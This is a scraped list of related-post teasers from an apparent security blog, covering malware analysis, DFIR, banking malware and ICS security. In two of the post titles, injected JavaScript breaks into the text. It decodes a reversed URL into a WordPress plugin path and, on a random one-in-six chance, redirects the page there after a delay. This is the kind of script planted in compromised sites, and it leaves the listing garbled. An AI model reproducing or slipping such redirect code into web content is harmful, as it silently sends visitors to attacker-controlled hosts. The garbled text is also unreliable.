Related Posts
Cyber security for lawyers
Over the past year alone, law firms have seen a steady increase in email scams, ransom attacks, and privacy... read more

Introduction To Malware Analysis
There are many ways to study a program’s behavior. With static analysis, we study a program without actually executing... read more
DFIR Briefly Expained – Part 1
Since we are going to be learning in future blog posts the specifics of Digital Forensics & Incident Response... read more
Systems Administratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tors Appreciation Day 2018
July 27, 2018 – 19th Annual Your network is secure, your computer is up and running, and your printer is... read more
TODDLER: Credential theft overlays and accessibility event logging
In January of 2021, a new family of previously undetected banking malware was discovered. The samples were found on... read more
Industrial Cybersecurity: Guidelines for Protecting Critical Infrastructure
Over the weekend, the Alpharetta-based Colonial Pipeline was hit by an extensive ransomware attack that shut down its information... read more
Intro to PLCs, ICS and SCADA
ICS Industrial Control Systems or ICS have received a lot of attention lately. In the US the ICS-CERT was established... read more
Blockchains, Cryptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocurrency, and Infosec
Blockchain has become the technology industry buzzword of 2017-2018. Mention of it is widespread, but understanding and knowledge of... read more
Full disk encryption: do we need it?
Companies should consider implementing full disk encryption alongside other encryption methods on mobile devices.Companies should consider implementing full disk... read more
2020 Banking Malware Report
2020 has been a year marked by a virus, not one of the ones we usually talk about, but... read more
Leave a Reply